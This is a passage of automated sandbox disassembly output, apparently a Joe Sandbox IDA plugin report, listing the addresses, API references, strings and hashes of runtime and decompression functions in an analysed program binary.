                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B752610C), ref: 00007FF6B7525EF3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                                              • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                              • Instruction ID: c97ae06fdf2f689c01fc93bfbba8d2e3fb59e61bf1d702adbaa5a3a2cea08dfb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC514C33A1C64286E720DF29D8815B97761FB88794F414136EB4EC7AB6DF3CE4518740
                                                                                                                                                                                                                                              Function 00007FF6B750D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                              • Instruction ID: cf0a4ed76acf0aa4311c429a08e1263f8d6a44b67f07f7297b7b6e0ae947c764
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83111822B18B058AEB008B64E8542B933B4FB59758F440E35DB6D867B4EF7CD1A48340
                                                                                                                                                                                                                                              Function 00007FF6B7523C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1502251526-0
                                                                                                                                                                                                                                              • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                              • Instruction ID: 601a0e4293ab647a45b9383ee527b1c981a714c36bc16888c8880a96185d4792
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02C1C273B1C68687EB24CF19A08466AB7A1F794B84F448139DB4A87754DF3DF845CB40
                                                                                                                                                                                                                                              Function 00007FF6B750A474 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                              • API String ID: 0-1127688429
                                                                                                                                                                                                                                              • Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                              • Instruction ID: f328cc24e92a5a2d30199ea6942a91f25cef5fa3d795294d50fc0d8a211be7e3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99F15C73A1C3D58BE7A58B198488B3A7BA9FF44748F064538DB49977A0DF38E941CB40
                                                                                                                                                                                                                                              Function 00007FF6B7529728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 15204871-0
                                                                                                                                                                                                                                              • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                              • Instruction ID: 7be3d53748a90afa59bccd96d0c371f9e6a621f93462c424d6e0a1c09e6cf082
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBB14A77A08B898AEB59CF2DC8463687BA0F784B58F198925DB9D837B4CF39D451C700
                                                                                                                                                                                                                                              Function 00007FF6B75139A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                                                                                                              • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                              • Instruction ID: 7f31bcc0609cb379b250bf68ddde32083ede4d60108d503b314ebf606df551d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50E17F73A0C66686EB68CF2D816017D37A0FF45B8AF245235DB4E87AB4DF29E851C740
                                                                                                                                                                                                                                              Function 00007FF6B750A2DB Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                              • API String ID: 0-900081337
                                                                                                                                                                                                                                              • Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                              • Instruction ID: 5ac1a15439891cae0778529dfff3911d9fa9c2efe121f4448197dc16084a152e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6916373A1C28687E7A58F19D488B7E3BA9FF44758F114539DB4A867A0DF38E940CB40
                                                                                                                                                                                                                                              Function 00007FF6B751DEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                                              • API String ID: 0-3030954782
                                                                                                                                                                                                                                              • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                              • Instruction ID: c416b752f3b6ba1d36005adc792a06cf1498ee20d550fb5d55672b8d4a456a48
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63517563B1C3E58AE7258F399840769AB91E744B95F488231CBAC8BEE5CF3DE5418700
                                                                                                                                                                                                                                              Function 00007FF6B75208C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1010374628-0
                                                                                                                                                                                                                                              • Opcode ID: 237fa8d459c5d11eae1bba494416b753c006fbba9c027a8b8839988129060696
                                                                                                                                                                                                                                              • Instruction ID: 41295089d012d37e45d9ee7b464c6e8af0754aded8b55fc5e68db4bf1b8b5abe
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 237fa8d459c5d11eae1bba494416b753c006fbba9c027a8b8839988129060696
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3802B123B1E65741FAA6AF2D98042796A90AF41BA0F554634DF5DC77F2DF3CE8818320
                                                                                                                                                                                                                                              Function 00007FF6B751DA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                                                                                                              • API String ID: 0-1523873471
                                                                                                                                                                                                                                              • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                              • Instruction ID: 9a53bdf5786a7c1bb0496357ac4d1eeed5f9cab0b44b1e31eb83a52c986e913e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25A146A3A0C7DA86EB21CF29A4407AA7B91AB51B84F048131DF8D87BA5DE7DE401D700
                                                                                                                                                                                                                                              Function 00007FF6B7518794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: TMP
                                                                                                                                                                                                                                              • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                              • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                              • Instruction ID: 384179bcda47d4a224e19fba5025d8bd2c885c9ac374e6f5ccc7cc8bacda8a0b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43516813F0C62251FA75AF2E59015BA5290AF44BE6F584835DF1EE7FA6EE3CF4428200
                                                                                                                                                                                                                                              Function 00007FF6B7523480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                                              • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                              • Instruction ID: 4886f7a5e88d53093addc9dcf6dd44dc0a333995f75a1148e10956d6a96c02c7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FB09221E0FB42C2EA082B296C8221832A47F58700F980138C24D90330EE2D20F56700
                                                                                                                                                                                                                                              Function 00007FF6B75135A0 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                              • Instruction ID: 93d30d9330703bb54f83c702ebacac93653509756b283a2224f250cbd598e58e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2D1AA77A0C6A286EB688F2D806067D27A0AB45B49F254239CF0D87FB5DF3DE945C740
                                                                                                                                                                                                                                              Function 00007FF6B7509800 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                              • Instruction ID: 3bdec0aff116ea5f2195a02f7795df88b9dd7369bd0b0709ea2903afbe819607
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FC19D762181E08BD28AEB29E4794BA73E1F78930DB95406BEF87477C5CB3CA414DB10
                                                                                                                                                                                                                                              Function 00007FF6B7512C10 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
